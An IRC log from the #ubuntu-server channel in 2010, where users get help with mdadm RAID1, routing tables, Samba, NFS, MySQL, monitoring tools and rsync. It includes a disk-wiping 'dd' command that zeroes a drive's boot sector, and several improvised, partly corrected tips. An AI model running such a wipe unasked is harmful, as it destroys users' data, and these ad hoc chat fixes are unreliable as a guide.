<alvin> This one looks easy. http://www.cyberciti.biz/faq/linux-creating-software-raid-one-arrays/ There's nothing about grub there, so be careful.
<kinygos> alvin: wow, thanks :) can't believe i didn't come across that...
<svnitcloud> any help for open nebula ?
<alvin> kinygos: As I said, I haven't done this myself. Maybe you need to adapt /etc/fstab. It won't hurt to do a sudo dpkg-reconfigure grub-pc afterwards too
<kinygos> alvin: well mdadm did everything i expected, so i'm hopeful :)
<kinygos> alvin: thanks for the help...i really appreciate your time
<alvin> kinygos: You're welcome
<Riddell> smoser: what has to happen to get the ec2 images signed off and published?
<jetole> Hey guys. I am auditing my file server to see which iSCSI and NFS is not being used however when it comes to NFS, I don't know how. Does anyone know how I can view a history of which hosts connected to the NFS server, when they did, what NFS mounts they connected to, etc
<alvin> jetole: No, but showmount -a will give you some information about connected (or not properly disconnected) hosts
<smoser> Riddell, they're ready to go
<Thelz> Hello. My ubuntu server installation got corrupted. Is it possible to install ubuntu on a different harddisk and reach the files that were in the original installation from the new installation? (I'm only after the files that were stored remotely using the Samba File Server)
<Riddell> smoser: great, so how does that happen?
<reggi>  by the way 192.168.0.50 is my linux laptop which i'm performing the ping f
<reggi> HEY folks I have a strange problem. When I ping 192.168.0.1 (the gateway) i get the following message http://paste.ubuntu.com/503187/  by the way 192.168.0.50 is my linux laptop which i'm performing the ping from.
<reggi> oCean, i'm posting in this channel incase my question is a network related answer.
<oCean> one channel at a time for the same question
<reggi> oCean, i've asked a question in #ubuntu only to be told to post in this channel due to it's 'network' nature.
<oCean> anyway, it means that the ip for the default gw is unreachable
<oCean> are you sure the .1 is up, and that the .50 is in the same network (netmask)?
<reggi> oCean, it's pointing back to this computer
<reggi> my laptop running ubuntu is .50 and the gateway is .1
<reggi> by the way, my laptop was configured as a dhcp server
<reggi> is there some kind of file that has a map of the network on my laptop?
<oCean> so you have multiple interfaces? One being .50, the other one .1
<reggi> oh wait. let me explain.
<reggi> my linux laptop was setup as the gateway. it had dhcp3 installed and was sharing a 3G mobile internet connection. but now I have the internet connection and gateway from another computer on the network.
<reggi> my linux laptop has eth0 set to static (192.168.0.50) and my gateway (the other computer with internet connection) is 192.168.0.1
<reggi> when I perform a ping 192.168.0.1 from my laptop i get the output
<reggi> as shown here: http://paste.ubuntu.com/503187/
<oCean> which brings me back to my original quesion: are you sure the .1 is up, and that the .50 is in the same network (netmask)?
<oCean> at which you said it's pointing back to this computer.
<oCean> Pointing back??
<reggi> hmm good question. let me check.
<reggi> ok here is the contents of my ifconfig from my laptop: http://paste.ubuntu.com/503193/
<oCean> ok, the /24 netmask is ok, it includes the .1
<oCean> 2nd step is to check if there are (correct) routes configured. Check route -n
<Thelz> ./24 is the first 3 numbers fixed and the 4th number not fixed, right?
<oCean> actually, they're called "octets": an ipv4 address is a group of four octets
<reggi> hmm
<reggi> yes
<reggi> i think you've hit the nail on the head oCean - it's about the routing
<reggi> i'll check the route
<oCean> Thelz: if you're interested, you can see here how it works: http://jodies.de/ipcalc?host=192.168.0.1. Just play around with the netmask, and see the bits in the octets change :)
<reggi> AHUH!
<reggi> oCean, how do I edit the route data?
<Thelz> oCean: I know. What I don't understand is why IP's aren't written in hex. That would've made stuff a lot easier
<oCean> reggi: using the "route" commands.
<Thelz> MACs are written in hex
<reggi> oh really?
<reggi> damn
<reggi> so oCean does that mean the route automatically populates itself?
<oCean> reggi: partially, when bringing up an interface
<oCean> you can add/edit static routes
<reggi> i think there are a couple of errors in my route http://paste.ubuntu.com/503198/
<reggi> see line 5?
<oCean> like "route add -net blah netmask blah gw blah" etc
<oCean> nvm line 5
<oCean> that's a special/reserved address
<oCean> but you seem to have 2 default routes, the lines starting with 0.0.0.0
<reggi> ya
<oCean> you could remove the default route line on the eth0 interface, and since line 4 is already there
<reggi> interesting
<reggi> and this is removed by a command line right?
<oCean> route del -net default gw 192.168.0.1 should do it
<oCean> route del -net default gw 192.168.0.1 dev eth0 <-- or that, with the added 'dev', not sure
<reggi> ya i'll try the second option
<oCean> oh wait, line 4 should be changed.
<oCean> Since that line still says 'everything to 192.168.0.0/24 should go through default gw'
<reggi> ahah
<oCean> So, following the previous example, you have to run commands like this:
<oCean> route del -net 192.168.0.0/24 gw 0.0.0.0
<oCean> and add
<oCean> route add -net 192.168.0.0/24 gw 192.168.0.1
<oCean> capice?
<reggi> i get it
<reggi> nice one oCean
<reggi> peter@peter-laptop:~$ sudo route add -net 192.168.0.0/24 gw 192.168.0.1
<reggi> SIOCADDRT: No such process
<ewook> the interface on that net is the gw, so change gw blabla to dev eth instead.
<oCean> that shows that the default gw (.1) is still not reachable
<oCean> reggi: yeah, what ewook said
<reggi> ahah
<oCean> routingtables are always fun. Anyway, I gotto run...
<oCean> bye
<reggi> man how do you guys know all this stuff!
<reggi> thanks for your help oCean
<oCean> ok!
<ewook> I've done the same thing you're doing.
<ewook> learning by doing.
<ewook> or, sometimes breaking :P
<reggi> i am a long time microsoft user
<reggi> desktop technician
<reggi> and decided to go cold turkey to linux
<reggi> so i can start learning
<ewook> cold turkey way is a hard way :)
<ewook> hey ivoks :D
<reggi> yeah well the first time I tried to go all linux was over5 years ago and I had a windows machine to fall back on...which mean that I kept relying on the microsoft machine
<reggi> so the only way was to go cold turkey
<ewook> I'm required to run ms os when working..
<reggi> yeah I still have xp but only in a virtualbox
<reggi> just a sec i have to test my route settings
<ewook> I tried to explain I could do the same, but it was a no go :(
<_ruben> is it possible to have a dot in the short, non-fqdn, hostname?
<_ruben> does it does
<_ruben> s/does/guess/
<kinygos> so...i'm back to my original state, a remote server (running 9.04 though), no access to external media, with 2 physical disks, only one partitioned and mounted....
<kinygos> i've read a lot about partitions, raid and mdadm...and now have an alternative strategy for implementing RAID1 on that server...
<pmatulis> kinygos: what happened to all the advice people poured on you?  was it wrong or what?
<kinygos> i had a fundamental misunderstanding of partitions
<pmatulis> kinygos: explain?
<kinygos> ok, the plan was to implement raid on the second disk, copy the data to that disk, make that disk bootable and reboot from it...
<kinygos> then add the original disk to the raid
<kinygos> my mistake was that the raid was logically smaller than the physical disk, and i went round in circles trying to copy data to it
<kinygos> i've done the typical noob thing which is dive in without really truly understanding what is going on under the hood
<pmatulis> kinygos: dunno if that's noob thing, it's what most people do to learn
<pmatulis> kinygos: not a great idea on an important system however
<kinygos> well, the system is going to host my web application...i'm a developer trying to be everything as i'm under a very limited budget
<pmatulis> kinygos: you're saying your array wasn't made large enough to contain all the data?
<kinygos> well, i was using dd to copy, and it was pointed out to me that it may not work, but i was incredibly foolish and let it run through the night to find it had failed due to insufficient space
<kinygos> ironically, the disk is practically empty :)
<kinygos> so, i've been learning about partitions, found out what the Extended partition actually means and how it fits into the grand scheme of things...
<kinygos> and i've found an option for mdadm --level=mirror
<_ruben> using dd is completely wrong to begin with
<kinygos> _ruben: i know...that suggestion did not come from anyone here by the way..it was my mistake alone
<_ruben> you want a filebased copy, not a clusterbased copy
<kinygos> well, what i'm considering now is creating corresponding partitions on my second disk, and then mirroring each in turn...
<kinygos> it may not be the most efficient, as i would've prefered my swap partition to be striped
<kinygos> brb in 15mins
<_ruben> kinygos: striped swap? so when 1 disk fails, you'd lose half your swap, and your system would crash? sounds like a plan!
<pmatulis> heh
<_ruben> hm, having a dot in the non-fqdn hostname doesnt work well afterall
<kinygos> rofl...and that is why i'm a noob
<reggi> hello anyone here?
<zoopster> no I don't think anyone is around today, reggi
<jpds> reggi: There are 282 people in here.
<reggi> har har very funny... it was a little quiet in here
<reggi> i've stuffed up my computer
<reggi> a little...
<reggi> i now no longer have eth0 in my network connection manager
<reggi> Wired Network has "device not managed"
<reggi> does anyone know how to get my eth0 to show in this network manager?
<zoopster> reggi: are you running ubuntu desktop?
<reggi> yes
<uvirtbot> New bug: #652038 in clamav (main) "package clamav-base 0.96.1+dfsg-0ubuntu0.10.04.2 failed to install/upgrade: subprocess installed post-installation script returned error exit status 10" [Undecided,New] https://launchpad.net/bugs/652038
 * zul cant believe that people are still using feisty
<zoopster> reggi: #ubuntu would be better for those types of q's...
<reggi> hey zoopster the reason I thought to ask in ubuntu-server is because my network settings are really wrong
<reggi> for example, if I ping 192.168.0.1 i get the following error "From 192.168.0.50 icmp_seq=3 Destination Host Unreachable"...192.168.0.50 is this (my laptop) and 192.168.0.1 is my gateway / router.
<reggi> i'm hoping to fix this otherwise i'll have to reinstall ubuntu again :(
<uvirtbot> New bug: #652042 in samba (main) "package samba-common 2:3.4.7~dfsg-1ubuntu3.2 failed to install/upgrade: subprocess installed post-installation script returned error exit status 10" [Undecided,New] https://launchpad.net/bugs/652042
<raubvogel> Does anyone have an idea of why rsyslog in my 10.04 desktop is using quite a lot of cpu:  1118 root      20   0  330m 7844 1016 S  173  0.1 953:13.17 rsyslogd
<zoopster> reggi: a reinstall won't fix incorrect settings
<reggi> i hear you zoopster
<raubvogel> reggi: try #ubuntu-beginners. I am not being condescending. I had a lot of luck there before. In fact I had more answers about creating a package and building my own repository there than in ubuntu-packaging and ubuntu-mirrors
<reggi> hmm
<reggi> i'll try that raubvogel
<reggi> cheers jolks
<reggi> folks
<raubvogel> The other thing would be to reinstall the network manager itself
<raubvogel> doing a --purge
<reggi> raubvogel, what is the full "--purge" command?
<raubvogel> In a server, first thing that goes away is network manager IMHO
<reggi> oh you mean using the synaptic?
<raubvogel> something like apt-get remove --purge network-manager or whatever the package is called
<raubvogel> synaptic probably would work too; it has something you can click on to say you want it to completely wipe that package. Normal uninstall leaves the old config files
<reggi> I would do away with the network manager because I know how to edit my /etc/network/interfaces
<reggi> but I use the network manager to connect to the internet using my mobile phone
<reggi> using bluetooth.
<raubvogel> don't get me wrong; network manager has come a long way. I use it in my own laptop for that very same reason
<reggi> you know, like tethering
<raubvogel> But it does things that drives me nuts
<reggi> unless you know of a way to connect to my mobile phone using bluetooth and then connect to the 3G internet.
<raubvogel> The nicest new thing it has IMHO is that you can specify the mac for the AP you are using
<reggi> hmmm
<reggi> maybe I should manually add it
<reggi> brb
<kinygos> hi all...i may be able to get an .iso image mounted so i'll be able to rebuild my server and configure the raid at a sensible time...
<kinygos> my question is, is it possible to back the whole system up regularly using rsync or something so that i can recover the whole box without having to reinstall the OS again?
<Jeeves_> kinygos: Yes, it it
<kinygos> Jeeves_: thanks, i'm feeling way out of my depth
<reggi> folks i think the problem with my internet is related to my laptop's network device has stopped working
<raubvogel> reggi: You can't start it manually?
<reggi> raubvogel, with this command? ifconfig eth0 up
<reggi> ?
<uvirtbot> New bug: #652065 in samba (main) "dhclient hook assumes wrong service name ("samba" instead of "smbd")" [Undecided,New] https://launchpad.net/bugs/652065
<raubvogel> If you are in the wired network, like ifconfig eth0 192.168.1.24 netmask 255.255.255.0 up (guessing an empty IP here)
<reggi> there is something wrong with my ifconfig output, see line 19: http://paste.ubuntu.com/503277/
<reggi> what is eth0:avahi?
<_ruben> start by forgetting ifconfig ever existed
<kalkems> I'm a newbee to IRC. How do I communicate it seems so quiet
<pmatulis> kalkems: you're doing fine
<kalkems> Questions here deal with server problems - I upgraded my ltsp server this morning and was greated with a message that it has deleted grub. (in chroot) This happened when uppdating latest kernel. Will this affect the server it self or only ltsp.
<MTecknology> hm... how long is too long for a php script to run?
<MTecknology> I fear this one may time out...
<hggdh> Daviey: are you going to propose a SRU for 650446?
<Daviey> hggdh, i think so.. Really want some feedback from Ng before doing so.
<hggdh> Daviey: my single worry is if this increase takes space from the -Xmx
<Daviey> Yeah... I don't know if it takes from there - or is additional..
<Daviey> perhaps JamesPage knows?
<Daviey> JamesPage, Does -XX:MaxPermSize steal from -Xmx, or in addition to?
<JamesPage> Daviey: in addition to
<Daviey> great, thanks JamesPage
<hggdh> then we are good :-) thanks, JamesPage
<JamesPage> heap and perm are separate memory areas in the JVM
<Daviey> groovy!
<JamesPage> hggdh, daviery:have you guys come across jps and jstat for looking at allocation/utilisation?
<Ng> Daviey: unless there's a way to make the JVM spit out memory stats the only feedback we're going to be able to come up with really is "it hasn't died for X days"
<hggdh> JamesPage: no, I at least have not (but I left Java a looong time ago, at 1.3 I think)
<Daviey> JamesPage, no, sorry. :/
<Daviey> Ng, Yeah... i think you are probably correct :(...  How many days uptime did it have before issue?
<Ng> Daviey: weirdly it was only a couple of weeks
<Ng> perhaps some usage pattern was exercising the system in such a way that it maximised the Permanent memory usage
<Daviey> Ng, That is pretty concerning :/
<Daviey> I wonder if it was being hammered from a user?
<JamesPage> Ng, daviey: jstat would help you monitor memory area utilisation in the JVM which might help diagnose the issue
<Ng> JamesPage: interesting
<SpamapS> JMX enabled apps tend to give lots of stats.
<kalkems> quit
<overlord_tm> Is there any way to scrool in intramfs shell? Something like <cmd> | less :)
<kalkems> sorry thought that was the way to leave:P
<hggdh> kalkems: put a '/' in front: '/quit'
<kalkems> hggdh: thanx
<dan_maran> Having a weird issue with Aptitude updating behind a Sonicwall. This not only is a ubuntu problem but also happens with debian or any apt based distro.  Yum seems to work fine altough that could be due to the yum fastest mirror.  Essentially what happens is and update is started and it all seems fine for anywhere from 10 seconds to minute, speeds of 600KB then out of no where it will just slow to Bytes like now I have an u
<dan_maran> pdate running and it is sitting at 1,446B/s. But if I download something on this notebook it will fly.  So I am thinking it is something with the apt settings triggering some kind of Sonicwall "feature" but I have ensured the QoS is OFF.. Any ideas?
<SpamapS> dan_maran: your firewall is probably dropping packets that it shouldn't.
<hggdh> dan_maran: maybe you are being throttled by your firewall
<SpamapS> I've seen firewalls' state tracking go awry and drop retransmit requests and window adjustments.
<SpamapS> dan_maran: do you have access to the firewalls' logs?
<dan_maran> @spamaps yes and there is not a thing in there about it.
<uvirtbot> New bug: #652140 in ntp (main) "package ntp 1:4.2.4p8 dfsg-1ubuntu2 failed to install/upgrade: subprocess installed post-installation script returned error exit status 1" [Undecided,New] https://launchpad.net/bugs/652140
<hggdh> I have had that scenario before... I "solved" it by cancelling the update and restarting it multiple times (it would be fast for a while then slow to a crawl)
<dan_maran> @hggdh yes, that is the only way that I get around it
<dan_maran> here is one of the errors
<dan_maran> 1	09/30/2010 11:34:09.432	Notice	Network Access	TCP connection dropped	91.189.88.46, 80, X1	192.0.100.69, 39326, X0, LINUX-01	TCP Port: 39326
<kinygos> SpamapS: i should have listened to you regarding the copy for my RAID problem...dd didn't work as there was just a little less space on the RAID :(
<kinygos> SpamapS: i've re-imaged the server, created the RAID on the second disk and now trying to mount it so i can do a file copy with cp -a
<hggdh> dan_maran: so your firewall dropped it. Too many errors, excessive use of bandwidth, what? You will need to sniff the connection and/or look at your firewall config
<dan_maran> @hggdh - Those drops correspond to my cancellation of the downloads
<hggdh> oh darn!
<hggdh> dan_maran: then you really have to look at the traffic on the session
<zoopster> dan_maran: I'd concur...it will likely be a quick resolution or problem discovery with a packet trace
<dan_maran> I will try to get on that ASAP, just was hoping someone else already had this issue and new the fix. oh well. Thanks and I will report back if I find it.
<_ruben> dan_maran: could also be various tcp "optimization" features wreaking havoc
<hggdh> dan_maran: in my case, when I had it, I had no access to the firewall system
<dan_maran> @_ruben that is my thought.... But since YUM works fine on RHEL I thought it would be a quick APT fix.. oh well
<SpamapS> kinygos: trying to mount it?
<SpamapS> kinygos: You said before you had 5 partitions on the disk
<SpamapS> kinygos: I'd suggest creating 5 partitions on /dev/md0, and creating a filesystem/swap on each one of them so they match.. /dev/sda1 -> /dev/md0p1
<kinygos> SpamapS: ah, yes, my understanding of partitions was fundamentally flawed yesterday...i've read up and hopefully know a bit more now
<_ruben> dan_maran: RHEL/Ubuntu might enable different optimizations by default
<SpamapS> kinygos: one good idea would be to save the output of 'fdisk -l /dev/sda' so you can see the size of the non-raid partitions and match them closely.
<kinygos> SpamapS: my first disk has 2 primary partions, one Linux swap, the other Extended which itself contains 4 logical partitions...
<dan_maran> Right on, thanks for the thoughts. I might install yum on the server and see if I can replicate.
<SpamapS> dan_maran: I thought there was nothing in there about it.. looks like the TCP connection was dropped for some reason.
<kinygos> SpamapS: ok, sounds like a plan, so create the partitions one at a time using parted?
<SpamapS> dan_maran: oh, its logging that you stopped it, right
<SpamapS> dan_maran: sorry, I'm catching up ;)
<dan_maran> @SpamapS - hhaa ok, yeah those of from me killing it. ;)
<SpamapS> kinygos: yes
<SpamapS> does anybody else find parted harder to use than fdisk? Maybe I'm just set in my ways.
<kinygos> can i do it with fdisk?
<kinygos> i'm so out of my depth...learning as i'm going along :(
<SpamapS> kinygos: fdisk is, IMO, simpler. ;)
<SpamapS> but maybe I'm missing the easier parts of parted
<SpamapS> I mean, if I have to resize, parted is where I go. ;)
<SpamapS> kinygos: either way, what you need to do is create a corresponding partition for each one from the original disk.
<SpamapS> kinygos: then create a matching filesystem on each one (probably ext3)
<kinygos> SpamapS: excellent, thanks :) it is indeed the ext3 filesystem, so i'm reading up...i came across parted because i wanted to reduce the size of one partition that was taking most of the disk with only 1% space used
<nimrod10> how can I extract the content from a deb package ?
<jpds> nimrod10: dpkg --extract package.deb /tmp/location
<nimrod10> thanks jpds
<oCean> nimrod10: please don't crosspost
<nimrod10> oCean, ok I won't do that. I imagined that noone will see my question is a sea of over 1000 users on #ubuntu
<oCean> nimrod10: ok
<SpamapS> kinygos: You probably have one partition that is swap, not ext3.. so make sure you know which one that is.
<kinygos> SpamapS: indeed, it's my first one on the first primary partition...i'm in the process of creating it, but am trying to figure out which cylinder it should end on as the RAID characteristics are completely different to the physical disk
<kinygos> SpamapS: eg, physical disk has 255 heads, 63 sectors, 30401 cylinders...RAID has 2 heads, 4 sectors, 61049616 cylinders
<kinygos> *eg/ie
<SpamapS> kinygos: you can just specify a size.
<SpamapS> kinygos: make the sizes about the same, should be fine.
<overlord_tm> how can i see which packages were updated and when?
<mathiaz> Daviey: o/
<mathiaz> Daviey: any news on the release front?
<jeiworth> say, quick question, if i want to have byobu autostart on a erver machine when logging in via ssh, where do i configure it? ~/.bashrc?
<Daviey> mathiaz, None really.. it's looking good.  I told ttx that i would be happy to sign it off - and he agreed.
<mathiaz> Daviey: o^5 - good job!
<zoopster> jeiworth: I did it from the screen interface (f9) there is an option to set it
<raubvogel> #solaris
<raubvogel> ooops
<jeiworth> zoopster: oh, well, that sounds obvious, i am so used to mangling with config-files ;)
<zoopster> jeiworth: well...call me lazy :-D
<jeiworth> zoopster: well, that did the trick, thanks!
<zoopster> jeiworth: yw
<elb0w> is there a 32bit server edition?
<RoyK> yes
<elb0w> nvm
<elb0w> found it
<kinygos> SpamapS: i think i've buggered it up (again)...i have my partitions, but i don't understand how to make the first one a swap partition :(
<kinygos> SpamapS: still looking online...sorry..i talk too much
<SpamapS> kinygos: in fdisk, you change the type to "linux swap"
<SpamapS> kinygos: and then do 'mkswap /dev/md0p0' or whatever the partition is
<SpamapS> kinygos: for the ext3 ones, 'mkfs.ext3 /dev/md0pX' should be enough. Then mount, rsync, done.
<kinygos> SpamapS: should i have done that before writing the partition table out? :(
<SpamapS> kinygos: no
<SpamapS> kinygos: you can just go change the types
<SpamapS> kinygos: and with swap.. its sort of.. less critical ;)
<kinygos> SpamapS: awesome, thank you for your time and continued support :)
<SpamapS> np
<spajderix> Hi
<uvirtbot> New bug: #652274 in mysql-5.1 (main) "package libmysqlclient16 5.1.49-1ubuntu7 failed to install/upgrade: trying to overwrite '/usr/lib/libmysqlclient.so.16.0.0', which is also in package mysql-cluster-client-5.1 7.0.9-1ubuntu7" [Undecided,New] https://launchpad.net/bugs/652274
<spajderix> on one of my server every few minutes la jumps very high all of a sudden, and server almost freezes. Situation lasts for a few seconds, and everything gets back to normal. htop shows no cpu usage, no sudden memusage, iotop shows no hdd activity. Is there a way to check what exactly blocks cpu, and what this process does?
<RoyK> spajderix: nfs blocking?
<kinygos> are directories like /lib and /var/lib related?
<RoyK> not really, /lib contains system libraries critical to the OS, /var/lib usually contains stuff like database data, dhcp leases and so on
<stbain> Are there any monitoring software packages (such as Zenoss or Hyperic) that are maintained and updated in the Ubuntu server repositories?
<RoyK> nagios?
<RoyK> that is - if you can say nagios is ever updated (it rarely is)
<stbain> RoyK, was looking for something a little more robust. Been a while since I looked at Nagios.
<RoyK> nagios is robust, but the gui sucks
<stbain> Is it still manual configuration file editing?
<RoyK> there are addons to do automatic stuff, but yes, manual config is the standard
<RoyK> I somehow like that - a config file doesn't get damaged as easily as a database gets corrupted
<RoyK> and a config file is easy to replace if something goes wrong
<RoyK> anyway - the configuration of nagios (or Icinga, a fork) is quite easy to learn
<stbain> I recall configuring Nagios manually... was hoping perhaps something better had come along by now.
<RoyK> stbain: nagios development has almost halted - seems they want to make money on nagios iv instead of keeping up the open development - that was the main reason for the icinga fork, which includes quite a bunch of new stuff
<RoyK> Europe according to Estonians http://www.youtube.com/watch?v=WUgqXGu_gTQ :D
<kinygos> in a similar vein, i lol'd at http://alphadesigner.com/project-mapping-stereotypes.html
<RoyK> hehe
<cfairles> what is mysql-dfsg ? vs. mysql-server
<RoyK> mysql-wtf?
<cfairles> Apparently there's a fix in mysql-dfsg for an apparmor issue preventing the innodb plugin from loading, but no lucid repo i have in my sources has a package called mysql-dfsg...
<sbeattie> cfairles: mysql-dfsg is the source package name, mysql-server is the binary package name.
<cfairles> hrm
 * RoyK doesn't like mysql very well except for tiny web stuff
<cfairles> sbeattie, i see, thanks. i think i'll just modify the apparmor config file myself for now.
<RoyK> cfairles: keep in mind that there are some rather bad bugs with innodb on high load
<illytacos> hello folks, have a bit of a problem and was wondering if someone could help. I am trying to manually configure and connect a SMB file server. I tried smbclient -L //server -U root and entered the server password not sure if this is correct got the error Connection to server failed (Error NT_STATUS_HOST_UNREACHABLE) right now I just want to see this ubuntu box on another windows laptop on the network. Any advice? I'm sure I'm
<EvilPhoenix> your message was cut off at "I'm sure I'm..."
<illytacos> oh that's ok I was just saying I'm sure I'm going wrong somewhere just not sure where lol
<SpamapS> illytacos: are you sure samba is running on the server?
<RoyK> illytacos: usually the root account is blocked in samba
<illytacos> SpamapS: nope. when I set up ubuntu server edition it gave me the option at the end to select from lamp server, samba server etc so I selected samba assuming it would be installed. I didn't even realize I had to run it. no wonder I'm running into problems
<SpamapS> illytacos: well it may or may not be running
<SpamapS> illytacos: if its installed, it should be running
<illytacos> SpamapS: how would I go about checking that>
<illytacos> omg ok sorry I think I understand what happened I have smbfs installed, smb client, samba-common-bin etc but samba itself... not installed -_-' sorry
<elb0w> Anyone installed mysql 5.5 on ubuntu 10.04?
<scrllock> are you having issues with it?
<elb0w> yeah
<elb0w> I tried the binary
<elb0w> and when I got done it wouldnt start
<scrllock> did it give you an error?
<elb0w> 100930 15:32:00 [ERROR] Can't find messagefile '/usr/share/errmsg.sys'
<elb0w> Anyone else?
<_ruben> that path doesnt look very sane to me
<elb0w> what?
<_ruben> i'd expect something like /usr/share/mysql-server/errmsg.sys instead .. then again, never with any mysql other than the one provided by default
<_ruben> and im afk again
<illytacos> you guys rock thanks the advice helped. I feel a little silly but I am in new territory here :) thanks for making it easier
<elb0w> root@DBS3:/usr/local/mysql# bin/mysqld status --lc-messages-dir="/usr/local/mysql/share/english/"
<elb0w> 100930 15:59:40 [ERROR] An old style --language value with language specific part detected: /usr/local/mysql/share/english/
<elb0w> 100930 15:59:40 [ERROR] Use --lc-messages-dir without language specific part instead.
<elb0w> any clue? sorry for paste in chan, just 3 lines
<dankest> Am I visible?
<elb0w> WHO SAID THAT
<dankest> hahaha appreciate it
<RoyK> elb0w: tried #mysql?
<elb0w> im sure theyll say they only do queries
<elb0w> sec
<wirelessdreamer> i'm stuck in a dependency loop, tied into this bug https://bugs.launchpad.net/ubuntu/+source/mysql-cluster-7.0/+bug/629005
<uvirtbot> Launchpad bug 629005 in mysql-cluster-7.0 "package libmysqlclient16 5.1.41-3ubuntu12.6 failed to install/upgrade: trying to overwrite '/usr/lib/libmysqlclient.so.16.0.0', which is also in package mysql-cluster-client-5.1 0:7.0.9-1ubuntu7" [High,Fix released]
 * RoyK heaves over his IBM 5155 portable
<wirelessdreamer> I can't get apt back into a sane state after trying to install mysqlcluster
<wirelessdreamer> this is on lts not the rc
<SpamapS> mathiaz: hey, would you say we're done ISO testing for the RC?
<mathiaz> SpamapS: definetely
<mathiaz> SpamapS: RC has been released
<mathiaz> SpamapS: there will be a respin for final
<SpamapS> mathiaz: ok, just updating workitems... gotta move that line. ;)
<mathiaz> SpamapS: so we'll do more iso testing down the line
<mathiaz> SpamapS: ;) - did the same thing this morning!
<mathiaz> SpamapS: and I'm working on another WI ATM
<SpamapS> mathiaz: *almost* straight http://people.canonical.com/~platform/workitems/maverick/canonical-server-ubuntu-10.10.html
 * SpamapS goes to lunch
 * ttx waves
<mathiaz> ttx: o/^5
<ttx> mathiaz: everything good ?
<mathiaz> ttx: RC is out of the door
<ttx> mathiaz: inet connectivity is particularly bad at this conference
 * mathiaz hands a satellite modem to ttx 
<ttx> ah! that should be handy, if only the auditorium wasn't in the basement
 * mathiaz hands a wide-range satellite antenna to ttx 
<uvirtbot> New bug: #652433 in krb5 (main) "Init script dependency error: krb5-kdc starts before slapd" [Undecided,New] https://launchpad.net/bugs/652433
<ruben23> hi guys whast the command to check the installed packages on an ubuntu-server..
<ruben23> anyone have idea please
<SpamapS> ruben23: dpkg -l
<SpamapS> ruben23: note that it will also show packages which have been installed, but removed and left behind config files. (the ones that start with 'rc')
<uvirtbot> New bug: #652489 in openssh (main) "package openssh-server 1:5.3p1-3ubuntu4 failed to install/upgrade: subprocess installed post-installation script returned error exit status 127" [Undecided,New] https://launchpad.net/bugs/652489
<uvirtbot> New bug: #652515 in dovecot (main) "package dovecot-postfix 1:1.2.11-1ubuntu1 failed to install/upgrade: subprocess installed post-removal script killed by signal (Killed)" [Undecided,New] https://launchpad.net/bugs/652515
<uvirtbot> New bug: #652519 in dovecot (main) "package dovecot-postfix 1:1.2.11-1ubuntu1 failed to install/upgrade: ErrorMessage: subprocess installed post-installation script returned error exit status 137" [Undecided,New] https://launchpad.net/bugs/652519
#ubuntu-server 2010-10-01
<astm> [root@perseus ~]# showmount -e mynfsserver
<astm> mount clntudp_create: RPC: Port mapper failure - RPC: Unable to receive
<astm> i'm with a problem on ubuntu server 10.04
<astm> in some clients the nfs server just works but in a specific client it doesn't.
<astm> can anyone help me?
<astm> problem solved. thanks..
<osmosis> is there something lspci, but for getting info about what HDs are installed in my system?
<astm> osmosis: lshw, lshal
<astm> osmosis: parted
<osmosis> astm, cool
<Andre_Gondim> I need to copy all folder except one, how may I do this? cp -R /folder ....
<demonspork> what is a good network usage monitor for Ubuntu? I would love if there was a good one that could keep daily/weekly/monthly usage stats as well as a live load count - even better if auto generates the report in HTML or something
<pmatulis> demonspork: cactii mabye
<pmatulis> !info cacti | demonspork
<ubottu> demonspork: cacti (source: cacti): Frontend to rrdtool for monitoring systems and services. In component universe, is extra. Version 0.8.7e-2 (lucid), package size 2033 kB, installed size 5488 kB
<kinygos> Andre_Gondim: perhaps one of the experts here may answer, but i'd suggest rsync with an --exclude switch
<Andre_Gondim> kinygos, thanks
<kinygos> Andre_Gondim: anytime
<kinygos> the Full Circle interview with Leann Ogasawara has been shared on facebook...in case she didn't know she's now famous :)
<kinygos> would the following command delete the partition table on my disk /dev/sdb...
<kinygos> dd if=/dev/zero of=/dev/sdb bs=512 count=1
<pmatulis> kinygos: that will blow away the boot sector, which contains the partition table
<kinygos> pmatulis: awesome, thanks :)
<kinygos> for some reason, running that command not only cleared the partition table on disk /dev/sdb, it also cleared a warning about an invalid flag 0x0000 against /dev/sda
<kinygos> but i've also lost the disk identifier...
<Andre_Gondim> kinygos, do you know the syntax? to copy all folder except one?
<kinygos> Andre_Gondim: i've been using the following (again, i'm a noob so the experts may jump in)...
<kinygos> Andre_Gondim: rsync -auHxv --exclude=/not_copied --exclude=/dest /* /dest
<kinygos> Andre_Gondim: check the switches though, for example, -H is to preserve hard links, you may not want that
<Andre_Gondim> where are the source?
<kinygos> in my command there, the source is /*
<Andre_Gondim> hmm ok
<kinygos> and the destination was /dest
<twb> You should always specify the trailing slash of directories in rsync calls
<kinygos> Andre_Gondim: sorry...the command should be:
<kinygos> rsync -auHxv --exclude=/not_copied/* --exclude=/dest/* /source/* /dest/
<kinygos> twb: absolutely right...my mistake, my mistake
<Andre_Gondim> let me try
<kinygos> Andre_Gondim: and in that command, the source directory being copied is /source/ which cannot contain /not_copied/ so i will now go to sleep
<Andre_Gondim> kinygos, many thanks
<kinygos> Andre_Gondim: anytime, apologies for any confusion
<Andre_Gondim> no problem ;)
<n3kl> I am new to libvirt and struggling to get the network to work like I think it should.  Is this a good place to ask about it?
<demonspork> Cacti. I have been over the manual for over an hour and I haven't even successfully gotten it to graph or even begin monitoring my network usage. Anyone have any pointers? my current break point is that I have no idea what I am doing with snmp, all of the guides just say "enter your snmp community" WHAT DOES THAT EVEN MEAN
<n3kl> a community is like a password.  When you go into cacti, you will want to add devices, yes?  So when you add the device, you should be able to turn on snmp, then choose the version and set your community and graphs
<n3kl> you can test to see if snmp is woking with snmpwalk from another box
<twb> n3kl: yes, or #virt (#libvirt?)
<n3kl> or locally, but iirc you need to change your /etc/default/snmpd to listen on another interface
<n3kl> twb: thanks
<DaveWM> what package would i install to get ciphers for sshd working,  i searched apt for blowfish and arcfour  but it lists a lot of packages,  not sure what i should install
<DaveWM> i'm working off of a openvz minimal ubuntu server template,  so i guess some of that stuff was left out
<DaveWM> nm,  got it working
<twb> DaveWM: sshd ciphers are compiled in
<twb> DaveWM: you can choose which are enabled (and their order of preference) by customizing the Ciphers value in sshd_config or ssh_config.
<twb> Note: the Cipher option (singular) only applies to legacy SSHv1 connections, and you really shouldn't use SSHv1.
<DaveWM> twb : thanks ,  i'm trying to get x11forwarding to perform a little better over mobile connection
<twb> Anything telling you to set "Cipher blowfish" is obsolete; ignore it.
<twb> Oh, X11.  You should look into NX.
<DaveWM> yea i read plenty stating it as being faster
